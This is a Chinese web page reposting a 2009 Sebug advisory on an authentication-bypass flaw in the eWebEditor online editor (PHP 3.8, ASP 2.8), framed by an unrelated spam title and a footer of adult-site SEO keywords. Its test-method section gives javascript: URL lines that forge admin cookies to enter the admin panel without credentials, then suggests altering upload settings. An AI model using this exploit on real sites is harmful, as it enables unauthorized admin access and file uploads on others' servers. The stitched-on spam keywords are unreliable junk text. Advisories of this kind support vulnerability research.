91网首页-91网页版-91网在线观看-91网站免费观看-91网站永久视频-91网站在线播放

LOGO OA教程 ERP教程 模切知識交流 PMS教程 CRM教程 開發文檔 其他文檔  
 
網站管理員

ewebeditor php&asp版本后臺跳過認證漏洞-適用于asp2.8 PHP3.8

admin
2010年8月13日 10:20 本文熱度 5239

SSV ID:19010

SEBUG-Appdir:eWebEditor

發布時間:2009-12-12

影響版本:

php v3.8
asp v2.8

漏洞描述:

eWebEditor是一個所見即所得的在線編輯器。顧名思義,就是能在網絡上使用所見即所得的編輯方式進行編輯圖文并茂的文章、新聞、討論貼、通告、記事等多種文字處理應用。
../ewebeditor/admin/config.php文件
用戶認證方式存在嚴重的安全漏洞,可以直接跳過認證獲取到管理員權限。


測試方法:

[www.sebug.net]
本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!
首先當然要找到登陸后臺,默認是../eWebEditor/admin/login.php,進入后臺后隨便輸入一個用戶和密碼,當然會提示出錯了.
這時候你清空瀏覽器的url,然后輸入
javascript:alert(document.cookie="adminuser="+escape("admin"));
javascript:alert(document.cookie="adminpass="+escape("admin"));
javascript:alert(document.cookie="admindj="+escape("1"));
后三次回車,清空瀏覽器的 url,大家注意了,這次輸入的url要注意,我們這次要輸入的文件都是在正常情況下經過驗證才能瀏覽的文件如../ewebeditor/admin /default.php
哈哈,直接進去了,利用和asp一樣,新增樣式修改上傳,就ok了

SEBUG安全建議:

暫無
請參考官方補丁

// sebug.net [2010-01-27]

該文章在 2010/8/13 10:20:56 編輯過
關鍵字查詢
相關文章
正在查詢...
點晴ERP是一款針對中小制造業的專業生產管理軟件系統,系統成熟度和易用性得到了國內大量中小企業的青睞。
點晴PMS碼頭管理系統主要針對港口碼頭集裝箱與散貨日常運作、調度、堆場、車隊、財務費用、相關報表等業務管理,結合碼頭的業務特點,圍繞調度、堆場作業而開發的。集技術的先進性、管理的有效性于一體,是物流碼頭及其他港口類企業的高效ERP管理信息系統。
點晴WMS倉儲管理系統提供了貨物產品管理,銷售管理,采購管理,倉儲管理,倉庫管理,保質期管理,貨位管理,庫位管理,生產管理,WMS管理系統,標簽打印,條形碼,二維碼管理,批號管理軟件。
點晴免費OA是一款軟件和通用服務都免費,不限功能、不限時間、不限用戶的免費OA協同辦公管理系統。
Copyright 2010-2025 ClickSun All Rights Reserved

主站蜘蛛池模板: 91国产爽黄在 | 日韩欧美高清 | 日韩精品专 | 91精品国产| 精品一二三区不卡 | 九色91 | 蜜桃视频高清免费 | 日本在线干 | 91免费网址 | 另类国产女王 | 欧美最猛xxx | 国产日产一区二 | 国产激情免费播放 | 国产亚洲新免费视 | 日韩午夜三级 | 国产精品天天看 | www.成人午夜 | 日韩精品不卡自拍 | 国产美女遭 | 国产拳头交一 | 97资源共享 | 国产福利在线 | 海量精品楼凤 | 国产精一二三婷 | 欧美亚洲图片日韩 | 午夜大尺| 国产在线精品二区 | 日韩亚洲人成影院 | 国产精品欧美激情 | 国产美女自拍视频 | 国产中文字幕第一页 | 1000部禁| 国产亚洲人成a | 区二区欧美 | 91黑料在线观看 | 欧美性一区二区三区 | 动漫在线观看 | 国内亚洲| 91福利电影网站 | 国产日韩一二三四区 | 国产在线视频一区 |